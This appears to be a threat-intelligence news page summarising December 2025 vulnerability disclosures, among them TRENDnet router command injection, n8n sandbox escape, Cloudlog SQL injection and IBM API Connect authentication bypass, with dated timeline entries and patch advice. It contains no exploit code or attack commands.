Multiple High-Impact Vulnerabilities Disclosed Across Diverse Software Products
A series of critical and high-severity vulnerabilities have been disclosed affecting a wide range of software products, including network devices, workflow automation platforms, document management systems, and developer tools. Notable issues include command injection flaws in TRENDnet TEW-800MB routers (CVE-2025-15136, CVE-2025-15137), remote code execution vulnerabilities in Xspeeder SXZOS (CVE-2025-54322), Eigent (CVE-2025-68952), StreamVault (CVE-2025-66203), n8n (CVE-2025-68668), and Yealink T21P_E2 phones (CVE-2025-66738). Additional vulnerabilities involve authentication bypasses in IBM API Connect (CVE-2025-13915) and Eaton UPS Companion (CVE-2025-59887), a session token capture flaw in M-Files Server (CVE-2025-13008), prototype pollution in apidoc-core (CVE-2025-13158), and a blind SQL injection in Cloudlog (CVE-2024-44065). Several of these vulnerabilities allow for remote exploitation, with some exploits already publicly available.
Vendors have responded with patches for many of the affected products, such as Eigent, StreamVault, lmdeploy, and n8n, while some issues remain with public exploits and no vendor response, as seen with TRENDnet. The vulnerabilities present risks ranging from arbitrary code execution and privilege escalation to unauthorized access and data exposure. Organizations using the affected products are strongly advised to review the relevant advisories, apply available patches, and implement recommended mitigations to reduce the risk of exploitation. The diversity and severity of these vulnerabilities underscore the importance of timely vulnerability management and monitoring for emerging threats across the software supply chain.
Timeline
Dec 28, 2025
Second TRENDnet TEW-800MB command injection flaw disclosed in NTPSyncWithHost.cgi
CVE-2025-15137 was published for TRENDnet TEW-800MB, describing remote command injection in the NTPSyncWithHost.cgi sub_F934 function. The advisory noted public exploit availability and that no official patch or vendor response had been provided as of publication.
Dec 28, 2025
TRENDnet TEW-800MB wizardset command injection disclosed without vendor response
CVE-2025-15136 was published for TRENDnet TEW-800MB 1.0.1.0, where the do_setWizard_asp function in /goform/wizardset could be abused for remote command execution via the WizardConfigured argument. The disclosure said the vendor had been notified but had not responded, and public exploits were already available.
Dec 27, 2025
PHP patches PDO PostgreSQL null pointer dereference across supported branches
CVE-2025-14180 was published for multiple PHP branches using the PDO PostgreSQL driver with emulated prepares enabled, where invalid character sequences could trigger a null pointer dereference and crash. PHP maintainers released fixes for affected versions and advised immediate upgrades.
Dec 27, 2025
Xspeeder SXZOS unauthenticated root RCE vulnerability published
CVE-2025-54322 was disclosed for Xspeeder SXZOS, allowing unauthenticated attackers to execute root-level commands through base64-encoded Python code in the chkid parameter of vLogin.py. The advisory recommended sanitizing input, restricting access, and updating to the latest version.
Dec 27, 2025
Eigent 1-click RCE vulnerability fixed in version 0.0.61
CVE-2025-68952 was disclosed for Eigent 0.0.60, describing a one-click remote code execution flaw that could execute arbitrary code on a victim machine or server after a single user interaction. The issue was patched in version 0.0.61, and public GitHub PoC material was referenced.
Dec 27, 2025
StreamVault authenticated RCE disclosed and patched in version 251126
CVE-2025-66203 was published for StreamVault versions prior to 251126, where authenticated administrators could inject malicious yt-dlp arguments through /admin/api/saveConfig and achieve remote code execution. The vendor patched the issue in version 251126 and public advisories and PoC material were available.
Dec 27, 2025
M-Files discloses session token capture flaw and releases patched versions
CVE-2025-13008 was disclosed for M-Files Server's web interface, allowing authenticated attackers to capture and reuse session tokens from other active users. Patched versions were released across affected branches, and organizations were urged to prioritize updates and monitor for abuse.
Dec 26, 2025
LMDeploy patches insecure deserialization flaw in version 0.11.1
CVE-2025-67729 was published for LMDeploy, where unsafe use of torch.load() could allow arbitrary code execution when loading malicious model checkpoint files. The vulnerability was fixed in LMDeploy 0.11.1, and users were advised not to load untrusted model files.
Dec 26, 2025
n8n discloses and patches Python Code Node sandbox escape in 2.0.0
CVE-2025-68668 was disclosed for n8n versions 1.0.0 up to but not including 2.0.0, where authenticated users with workflow permissions could escape the Pyodide-based Python Code Node sandbox and execute host commands. The issue was patched in version 2.0.0, with workarounds including disabling the Code Node or Python support.
Dec 26, 2025
Yealink T21P_E2 phone RCE vulnerability published
CVE-2025-66738 was disclosed for the Yealink T21P_E2 phone running firmware 52.84.0.15, allowing a remote attacker with normal privileges to execute arbitrary code through the diagnostic ping function. Recommended mitigations included firmware updates and restricting access to the diagnostic interface.
Dec 26, 2025
apidoc-core prototype pollution flaw disclosed with GitHub PoC
CVE-2025-13158 was published for apidoc-core from version 0.2.0 onward, describing a remotely exploitable prototype pollution issue in multiple worker modules via the define property. The disclosure noted GitHub proof-of-concept code and advised updating to a patched release.
Dec 26, 2025
IBM API Connect authentication bypass vulnerability published
CVE-2025-13915 was disclosed for IBM API Connect versions 10.0.8.0 through 10.0.8.5 and 10.0.11.0, allowing remote attackers to bypass authentication and gain unauthorized access. IBM recommended applying fixed versions and verifying authentication controls.
Dec 26, 2025
Eaton discloses and fixes UPS Companion library authentication bypass
Eaton disclosed CVE-2025-59887 in its UPS Companion installer, where improper authentication of library files could enable arbitrary code execution through search order hijacking. Eaton released a patched version and published remediation guidance the same day.
Dec 26, 2025
Gitea fixes attachment file extension bypass in version 1.23.0
A high-severity vulnerability tracked as CVE-2025-68939 was disclosed for Gitea versions before 1.23.0, allowing attackers to bypass attachment file extension restrictions by editing attachment names. The issue was addressed in Gitea 1.23.0, and users were urged to upgrade.
Dec 26, 2025
UTT 512W buffer overflow flaw disclosed with public PoC
CVE-2025-15092 was published for UTT 进取 512W devices running firmware up to 1.7.7-171114, describing a remotely exploitable strcpy-based buffer overflow in /goform/ConfigExceptMSN via the remark argument. The disclosure noted public proof-of-concept exploits and recommended updating firmware beyond the affected version.
Dec 26, 2025
Cloudlog blind SQL injection vulnerability published as CVE-2024-44065
A critical unauthenticated time-based blind SQL injection flaw affecting Cloudlog 2.6.15 at /index.php/logbookadvanced/search via the qsoresults parameter was publicly disclosed. Public proof-of-concept code was available, and users were advised to update and harden input handling.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Affected Products
Sources
5 more from sources like cvefeed high severity and cyber security news
Related Stories
Multiple High-Impact Vulnerabilities Disclosed Across Diverse Software Platforms
A series of critical and high-severity vulnerabilities have been disclosed affecting a wide range of software products, including workflow automation tools, web applications, network devices, and desktop software. Notable issues include remote code execution (RCE) flaws in *n8n*, *Lilac-Reloaded for Nagios*, *FileZilla Client*, and *AVideo*, as well as privilege escalation vulnerabilities in products like *Versa SASE Client*, *AspEmail*, and *ActFax*. Several vulnerabilities allow unauthenticated attackers to upload arbitrary files, bypass authentication, or exploit weak session management, potentially leading to full system compromise or unauthorized access to sensitive data. Many of these vulnerabilities have public exploits available, increasing the risk of active exploitation in the wild. Vendors have released patches for several of the affected products, and administrators are strongly advised to update to the latest versions or apply recommended mitigations. The vulnerabilities span a variety of attack vectors, including buffer overflows, improper input validation, insecure file upload mechanisms, and misconfigured authentication endpoints. Organizations should prioritize patching systems exposed to the internet and review access controls to limit the impact of potential exploitation. Immediate attention is warranted for products with critical CVSS scores and those with known public exploits.
1 months ago
Multiple Unrelated Critical Vulnerabilities Disclosed in October 2025
A series of critical and high-severity vulnerabilities affecting a diverse set of software products were publicly disclosed in October 2025. Epsilon RH by Grupo Castilla was found to have a SQL injection vulnerability (CVE-2025-41028) that allows attackers to manipulate the database by sending crafted POST requests to the 'sEstadoUsr' parameter in the '/epsilonnetws/WSAvisos.asmx' endpoint. Lanscope Endpoint Manager (CVE-2025-61932) was reported to have an improper origin verification flaw, enabling attackers to execute arbitrary code via specially crafted packets, though remote exploitation is not possible. Galaxy Software Services Vitals ESP Forum Module (CVE-2025-31342) was discovered to allow remote authenticated users to upload dangerous files, leading to arbitrary command execution. Fsas Technologies Inc.'s ETERNUS SF (CVE-2025-62577) contains incorrect default permissions, allowing low-privileged users to obtain database credentials and potentially escalate privileges to execute OS commands as an administrator. Excellent Infotek's Document Management System (CVE-2025-11948) is vulnerable to unauthenticated arbitrary file upload, enabling attackers to deploy web shells and execute code on the server. Vvveb CMS up to version 1.0.5 is susceptible to authenticated code injection via its Code Editor, allowing attackers to modify files and achieve remote code execution. The Theme Editor plugin for WordPress (CVE-2025-9890) is vulnerable to cross-site request forgery, which can be exploited to achieve remote code execution if an administrator is tricked into clicking a malicious link. The PPOM plugin for WooCommerce (CVE-2025-11391) allows unauthenticated arbitrary file uploads, posing a severe risk to affected e-commerce sites. The Appointments plugin for WordPress (CVE-2017-20206) and the Flickr Gallery plugin (CVE-2017-20207) both suffer from unauthenticated PHP object injection vulnerabilities, which have been actively exploited to create backdoors using the WP_Theme() class. RegistrationMagic (CVE-2017-20208) is also affected by a PHP object injection flaw, allowing attackers to fetch and install remote files. Finally, BLU-IC2 and BLU-IC4 devices (CVE-2025-11925) have an API that returns an incorrect Content-Type header, potentially enabling HTML/JavaScript injection in responses. Each of these vulnerabilities presents a significant risk, with several allowing remote code execution, privilege escalation, or the installation of persistent backdoors. The affected products span web applications, content management systems, endpoint management tools, and specialized enterprise software. Security teams are advised to review the specific advisories, apply patches or mitigations where available, and monitor for signs of exploitation, as several vulnerabilities have been reported as actively exploited in the wild. The diversity and severity of these disclosures underscore the ongoing need for rigorous vulnerability management and timely response to public advisories.
1 months ago
Multiple Security Vulnerabilities Disclosed Across Major Software Platforms
Several major software vendors, including Mozilla, Node.js, SonicWall, Cisco, Google, Apple, Ubuntu, Red Hat, VMware, and TeamViewer, have disclosed security vulnerabilities affecting a wide range of products. These advisories highlight issues such as OS command injection in the Node.js `systeminformation` library, privilege escalation in SonicWall SMA1000, improper input validation in Cisco Secure Email Gateway, and multiple vulnerabilities in browsers like Firefox and Chrome. Additionally, Apple products, Epson printers, and TeamViewer DEX Client have been identified as having critical security flaws, with some advisories noting the potential for remote code execution or privilege escalation if left unpatched. Security agencies and vendors are urging users and administrators to review the relevant advisories and apply patches or mitigations as soon as possible. The vulnerabilities span operating systems (Linux kernel in Ubuntu and Red Hat), cloud and virtualization platforms (VMware Tanzu), and widely used remote access tools (TeamViewer). The breadth of affected products underscores the importance of timely updates and vigilance in monitoring official security channels for new disclosures and remediation guidance.
1 months ago